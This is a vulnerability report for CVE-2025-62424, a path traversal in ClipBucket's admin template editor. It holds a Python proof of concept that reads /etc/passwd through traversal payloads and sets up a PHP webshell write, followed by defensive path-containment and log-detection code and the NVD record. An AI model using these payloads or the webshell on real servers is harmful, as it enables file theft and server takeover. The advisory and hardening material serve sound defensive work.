Security Vulnerability Report
CVE-2025-62424 CVSS 6.7 MEDIUM

CVE-2025-62424

Published: 2025-10-17 18:15:38
Last Modified: 2025-11-10 19:58:14

Description

ClipBucket is a web-based video-sharing platform. In ClipBucket version 5.5.2 - #146 and earlier, the /admin_area/template_editor.php endpoint is vulnerable to path traversal. The validation of the file-loading path is inadequate, allowing authenticated administrators to read and write arbitrary files outside the intended template directory by inserting path traversal sequences into the folder parameter. An attacker with administrator privileges can exploit this vulnerability to read sensitive files such as /etc/passwd and modify writable files on the system, potentially leading to sensitive information disclosure and compromise of the application or server. This issue is fixed in version 5.5.2 - #147.

CVSS Details

CVSS Score
6.7 (the secondary CVSS 3.1 entry in the raw JSON below; the primary entry rates the same vector with A:N at 6.5, also MEDIUM)
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L

Both assessments carry PR:H: the endpoint lives under /admin_area and the attacker must already hold an administrator session, which is why arbitrary read and write of server files is rated only MEDIUM. The practical risk is post-authentication escalation from a compromised administrator account to file access, and potentially code execution, on the host.

Configurations (Affected Products)

cpe:2.3:a:oxygenz:clipbucket:*:*:*:*:*:*:*:* - VULNERABLE
ClipBucket 5.3 up to and including 5.5.2 - #146 (per the NVD CPE match: versionStartIncluding 5.3, versionEndExcluding 5.5.2-147); fixed in 5.5.2 - #147

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62424 - ClipBucket Path Traversal PoC
# Vulnerability: Path Traversal in /admin_area/template_editor.php via folder parameter
# Affected: ClipBucket <= 5.5.2 - #146
# Fixed in: 5.5.2 - #147
# Requires: Authenticated administrator credentials
#
# Note: the login URL, form field names and the save parameters used below are
# the PoC author's assumptions about the ClipBucket admin panel, not details
# taken from the advisory; verify them against the target's actual forms.
import requests

TARGET_URL = "http://target-clipbucket-site.com"
ADMIN_USER = "admin"
ADMIN_PASS = "password123"

# Step 1: Login as administrator
session = requests.Session()
login_url = f"{TARGET_URL}/admin_area/login.php"
login_data = {"username": ADMIN_USER, "password": ADMIN_PASS}
login_response = session.post(login_url, data=login_data)
login_response.raise_for_status()  # a non-2xx here means the assumed login form is wrong

# Step 2: Exploit path traversal via folder parameter
# Read sensitive system file (e.g., /etc/passwd)
template_editor_url = f"{TARGET_URL}/admin_area/template_editor.php"

# Payloads to traverse out of the template directory and read /etc/passwd.
# requests percent-encodes params itself, so the third entry reaches the server
# double-encoded ("..%252F"); it only works if the application decodes twice.
payloads = [
    {"folder": "../../../etc/passwd"},
    {"folder": "....//....//....//etc/passwd"},
    {"folder": "..%2F..%2F..%2Fetc%2Fpasswd"},
    {"folder": "..\\..\\..\\etc\\passwd"},
]

for payload in payloads:
    print(f"\n[*] Trying payload: {payload}")
    response = session.get(template_editor_url, params=payload)
    # Crude success check: look for passwd-style entries in the returned page
    if "root:" in response.text or "nobody:" in response.text:
        print("[+] Path traversal successful! File contents:")
        print(response.text[:2000])
        break
    else:
        print("[-] Payload failed or file not readable.")

# Step 3: Write arbitrary file (e.g., plant a webshell)
# Example: write to a location the web server user can write to.
# The "content" and "action" parameter names are assumed, see note above.
write_payload = {
    "folder": "../../../var/www/html/templates/shell.php",
    "content": "<?php system($_GET['cmd']); ?>",
    "action": "save",
}
# response = session.post(template_editor_url, data=write_payload)
# print("[+] Webshell written (if write is permitted)")
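The four payload shapes in the PoC are not equally dangerous against a correctly written check, and a naive filter makes one of them worse. What follows is an added example, not ClipBucket's code and not taken from the advisory or the patch commit: a path-containment check of the kind a fix for CWE-22 needs (canonicalise, refuse absolute paths, compare the resolved path against the template root by components), a "strip ../" filter for contrast, and a log rule that flags template_editor.php requests whose folder value carries traversal sequences. The template root, the folder names and the access-log lines are constructed for the example.

```python
import os
import re
import urllib.parse
from typing import Dict, List, Optional, Tuple

# Constructed for this example: where an install might keep its templates.
TEMPLATE_ROOT = "/var/www/clipbucket/styles"

# One benign folder name plus the payload shapes used in the PoC on this page.
FOLDERS = {
    "benign": "cb_28/layout",
    "plain": "../../../etc/passwd",
    "nested": "....//....//....//etc/passwd",
    "encoded": "..%2F..%2F..%2Fetc%2Fpasswd",
    "backslash": "..\\..\\..\\etc\\passwd",
    "absolute": "/etc/passwd",
}


def canonical(folder: str) -> str:
    """Percent-decode until stable (defeats double encoding) and treat
    backslashes as separators so the same check also covers Windows hosts."""
    prev = None
    while prev != folder:
        prev, folder = folder, urllib.parse.unquote(folder)
    return folder.replace("\\", "/")


def naive_filter(folder: str) -> str:
    """The kind of 'fix' that does not work: delete every '../' once."""
    return folder.replace("../", "")


def escapes_root(root: str, folder: str) -> bool:
    """True if joining folder onto root resolves to a path outside root.
    commonpath compares whole components, so '/styles-old' is not mistaken
    for a child of '/styles' the way a string-prefix test would."""
    root_real = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root_real, folder))
    return os.path.commonpath([root_real, target]) != root_real


def resolve_in_root(root: str, folder: str) -> Optional[str]:
    """Hardened resolution: canonicalise, refuse absolute paths, and accept
    only a target whose real path is still under root. None means reject."""
    folder = canonical(folder)
    if os.path.isabs(folder) or escapes_root(root, folder):
        return None
    return os.path.realpath(os.path.join(os.path.realpath(root), folder))


def audit(root: str = TEMPLATE_ROOT) -> Dict[str, Tuple[bool, bool]]:
    """Per payload: (escapes root after naive_filter, accepted by resolve_in_root)."""
    return {
        name: (escapes_root(root, naive_filter(canonical(folder))),
               resolve_in_root(root, folder) is not None)
        for name, folder in FOLDERS.items()
    }


# Detection side: constructed access-log lines, not real traffic.
LOG = [
    '10.0.0.5 - - [17/Oct/2025:18:20:01 +0000] "GET /admin_area/template_editor.php?folder=cb_28%2Flayout HTTP/1.1" 200 5120',
    '10.0.0.9 - - [17/Oct/2025:18:21:44 +0000] "GET /admin_area/template_editor.php?folder=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1937',
    '10.0.0.9 - - [17/Oct/2025:18:22:10 +0000] "GET /admin_area/template_editor.php?folder=....//....//....//etc/passwd HTTP/1.1" 200 1937',
]
REQ = re.compile(r'"(?:GET|POST) /admin_area/template_editor\.php\?([^ "]*)')
# '..' itself, and runs like '....' that only become '..' once a mangling filter has run
DOT_RUN = re.compile(r"\.{2,}")


def flag_requests(lines: List[str]) -> List[str]:
    """Return the log lines whose folder parameter looks like a traversal attempt."""
    hits = []
    for line in lines:
        m = REQ.search(line)
        if not m:
            continue
        folder = urllib.parse.parse_qs(m.group(1)).get("folder", [""])[0]
        c = canonical(folder)
        if os.path.isabs(c) or any(DOT_RUN.fullmatch(seg) for seg in c.split("/")):
            hits.append(line)
    return hits


if __name__ == "__main__":
    for name, (naive_escapes, hardened_accepts) in audit().items():
        print(f"{name:10s} escapes after naive filter: {naive_escapes!s:5s} hardened accepts: {hardened_accepts}")
    print(len(flag_requests(LOG)), "of", len(LOG), "log lines flagged")
```

Two results are worth dwelling on. The "....//" payload is accepted by resolve_in_root, correctly: on its own it names a harmless directory literally called "...." under the template root, and it only becomes "../../../etc/passwd" after naive_filter removes one "../" from the middle of each segment, which is why the naive variant reports it as escaping the root. The detection rule flags it anyway, because an administrator session asking for a folder named "...." is an attempt even when the target instance is patched. The encoded and backslash forms collapse to the plain form after canonical(), so a check that runs only before decoding, or that treats "\" as an ordinary character on a Windows host, misses them.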

References

https://github.com/MacWarrior/clipbucket-v5/commit/c06d0f2e69c9acb008cebbd34fd5f29da3191a28 (Patch)
https://github.com/MacWarrior/clipbucket-v5/security/advisories/GHSA-3v2p-rfwx-52qj (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-62424",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-17T18:15:37.870",
    "lastModified": "2025-11-10T19:58:14.303",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "ClipBucket is a web-based video-sharing platform. In ClipBucket version 5.5.2 - #146 and earlier, the /admin_area/template_editor.php endpoint is vulnerable to path traversal. The validation of the file-loading path is inadequate, allowing authenticated administrators to read and write arbitrary files outside the intended template directory by inserting path traversal sequences into the folder parameter. An attacker with administrator privileges can exploit this vulnerability to read sensitive files such as /etc/passwd and modify writable files on the system, potentially leading to sensitive information disclosure and compromise of the application or server. This issue is fixed in version 5.5.2 - #147."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L",
            "baseScore": 6.7,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 5.5
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-22"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:oxygenz:clipbucket:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "5.3",
                "versionEndExcluding": "5.5.2-147",
                "matchCriteriaId": "31214EBB-325C-478D-9E78-FACDB17B17D2"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/MacWarrior/clipbucket-v5/commit/c06d0f2e69c9acb008cebbd34fd5f29da3191a28",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/MacWarrior/clipbucket-v5/security/advisories/GHSA-3v2p-rfwx-52qj",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}